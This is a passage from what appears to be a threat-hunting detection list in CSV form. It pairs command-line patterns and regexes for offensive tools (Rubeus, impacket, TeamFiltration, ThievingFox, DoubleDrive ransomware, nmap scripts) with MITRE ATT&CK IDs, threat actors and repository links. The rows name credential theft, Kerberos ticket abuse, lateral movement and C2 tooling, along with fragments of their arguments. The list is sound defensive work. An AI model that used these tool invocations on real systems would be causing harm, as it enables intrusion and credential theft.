Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","3466" "* targetedKerberoast.py *",".{0,1000}\stargetedKerberoast\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3467" "* -target-ip * -remote-dll *.dll* -local-dll *",".{0,1000}\s\-target\-ip\s.{0,1000}\s\-remote\-dll\s.{0,1000}\.dll.{0,1000}\s\-local\-dll\s.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL 
Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","3468" "* --target-name * --domain * --dc-ip * --executable *.exe*",".{0,1000}\s\-\-target\-name\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-\-executable\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","3469" "* -Targets * -Method * -LocalAuth*",".{0,1000}\s\-Targets\s.{0,1000}\s\-Method\s.{0,1000}\s\-LocalAuth.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3470" "* -Targets All -Method WMI*",".{0,1000}\s\-Targets\sAll\s\-Method\sWMI.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3471" "* -Targets DCs*",".{0,1000}\s\-Targets\sDCs.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3472" "* targets-asn.nse*",".{0,1000}\stargets\-asn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3473" "* targets-ipv6-map4to6.nse*",".{0,1000}\stargets\-ipv6\-map4to6\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3474" "* targets-ipv6-multicast-echo.nse*",".{0,1000}\stargets\-ipv6\-multicast\-echo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3475" "* targets-ipv6-multicast-invalid-dst.nse*",".{0,1000}\stargets\-ipv6\-multicast\-invalid\-dst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3476" "* targets-ipv6-multicast-mld.nse*",".{0,1000}\stargets\-ipv6\-multicast\-mld\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3477" "* targets-ipv6-multicast-slaac.nse*",".{0,1000}\stargets\-ipv6\-multicast\-slaac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3478" "* targets-ipv6-wordlist.nse*",".{0,1000}\stargets\-ipv6\-wordlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3479" "* targets-sniffer.nse*",".{0,1000}\stargets\-sniffer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3480" "* targets-traceroute.nse*",".{0,1000}\stargets\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3481" "* targets-xml.nse*",".{0,1000}\stargets\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3482" "* --target-user * --dc-ip * -command *",".{0,1000}\s\-\-target\-user\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-command\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","3483" "* -TaskName ""SQLC2AgentPS*",".{0,1000}\s\-TaskName\s\""SQLC2AgentPS.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","3484" "* -TaskName *AutoRDPwn*",".{0,1000}\s\-TaskName\s.{0,1000}AutoRDPwn.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","3485" "* -TaskName RedPillTask*",".{0,1000}\s\-TaskName\sRedPillTask.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","windows Scheduled TaskName","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3486" "* Tater.ps1*",".{0,1000}\sTater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 
- T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","3487" "* --tcp-listen 127.0.0.1:* --write * --read *",".{0,1000}\s\-\-tcp\-listen\s127\.0\.0\.1\:.{0,1000}\s\-\-write\s.{0,1000}\s\-\-read\s.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","3488" "* tdotnet publish Athena *",".{0,1000}\stdotnet\spublish\sAthena\s.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","3489" "* TeamFiltration.dll*",".{0,1000}\sTeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3490" "* TeamFiltration.exe*",".{0,1000}\sTeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 
- TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3491" "* teams_dump.py*",".{0,1000}\steams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","3492" "* teams_dump.py*",".{0,1000}\steams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","3493" "* teamsenum.py*",".{0,1000}\steamsenum\.py.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","0","N/A","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","3494" "* teamspeak2-version.nse*",".{0,1000}\steamspeak2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3495" "* teamstracker.py*",".{0,1000}\steamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","3496" "* telnet-brute.nse*",".{0,1000}\stelnet\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3497" "* telnet-encryption.nse*",".{0,1000}\stelnet\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3498" "* telnet-ntlm-info.nse*",".{0,1000}\stelnet\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3499" "* --temp-email --target-paths *",".{0,1000}\s\-\-temp\-email\s\-\-target\-paths\s.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","3500" "* termux-chroot */cloudflared*",".{0,1000}\stermux\-chroot\s.{0,1000}\/cloudflared.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","3502" "* Test different CLientID's against MSGraph to determine permissions*",".{0,1000}\sTest\sdifferent\sCLientID\'s\sagainst\sMSGraph\sto\sdetermine\spermissions.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","3503" "* test_privesc.py*",".{0,1000}\stest_privesc\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","3504" "* tftp-enum.nse*",".{0,1000}\stftp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3505" "* tgssub * /ticket:*",".{0,1000}\stgssub\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3506" "* TGT_Monitor.ps1*",".{0,1000}\sTGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","0","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","3507" "* tgtdeleg /nowrap*",".{0,1000}\stgtdeleg\s\/nowrap.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3508" "* tgtdeleg /spn:cifs*",".{0,1000}\stgtdeleg\s\/spn\:cifs.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","3509" "* tgtdeleg /target:*",".{0,1000}\stgtdeleg\s\/target\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3510" "* thc-hidra*",".{0,1000}\sthc\-hidra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","3511" "* theHarvester.py *",".{0,1000}\stheHarvester\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3513" "* theHarvester.py*",".{0,1000}\stheHarvester\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","3514" "* Theif.dll*",".{0,1000}\sTheif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","3515" "* thief.py*",".{0,1000}\sthief\.py.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","3516" "* ThievingFox.py*",".{0,1000}\sThievingFox\.py.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","3517" "* --threads * scan --buckets-file* ",".{0,1000}\s\-\-threads\s.{0,1000}\sscan\s\-\-buckets\-file.{0,1000}\s","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","3518" "* ticket_converter.py*",".{0,1000}\sticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","0","N/A","N/A","10","2","167","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z","3519" "* ticketConverter.py*",".{0,1000}\sticketConverter\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - 
T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","3520" "* ticketsplease.*",".{0,1000}\sticketsplease\..{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","3521" "* TikiLoader*",".{0,1000}\sTikiLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
